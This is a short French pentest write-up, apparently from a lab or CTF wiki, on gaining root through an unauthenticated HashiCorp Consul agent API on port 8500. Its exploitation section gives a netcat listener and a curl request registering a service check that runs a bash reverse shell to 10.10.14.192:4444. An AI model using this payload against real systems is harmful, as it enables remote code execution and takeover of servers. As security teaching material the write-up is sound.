Port 8500 - Pentesting Consul UI

Découverte du Port 8500 (Consul)

En observant les ports ouverts, nous avons repéré le port 8500, qui correspond à l'interface web de Consul.

Après avoir effectué une requête sur 127.0.0.1:8500/ui/, nous avons trouvé la version de Consul 1.19.2.

curl 127.0.0.1:8500/ui/

Vérification de l'Accès à l'API REST

Nous avons testé l'API REST de Consul pour vérifier si elle était accessible sans authentification :

curl http://127.0.0.1:8500/v1/agent/self

Nous avons obtenu une réponse confirmant que l'API était ouverte.

Exploitation via une Check Malveillante

Hashicorp Consul v1.0 - Remote Command Execution (RCE)Exploit Database

Nous avons enregistré un service avec une check malveillante en utilisant une commande bash pour ouvrir un reverse shell vers notre machine :

nc -lvnp 4444

Enregistrement d’un service avec une check malveillante

Consul permet d’enregistrer dynamiquement des services via une requête HTTP. On exploite cela pour créer une "check" qui exécute une commande bash.

curl -X PUT http://127.0.0.1:8500/v1/agent/service/register -d '{
  "Name": "pwned",
  "ID": "pwned",
  "Check": {
    "Args": ["/bin/bash", "-c", "bash -i >& /dev/tcp/10.10.14.192/4444 0>&1"],
    "Interval": "10s"
  }
}'

Ce que fait ce payload :

Check.Args[] : contient une commande bash qui ouvre un reverse shell.
Interval: définit une exécution automatique toutes les 10 secondes.

En exécutant ce payload, nous avons réussi à obtenir un shell root.

Mis à jour il y a 10 mois

hashtagDécouverte du Port 8500 (Consul)

hashtagVérification de l'Accès à l'API REST

hashtagExploitation via une Check Malveillante

hashtagEnregistrement d’un service avec une check malveillante

Découverte du Port 8500 (Consul)

Vérification de l'Accès à l'API REST

Exploitation via une Check Malveillante

Enregistrement d’un service avec une check malveillante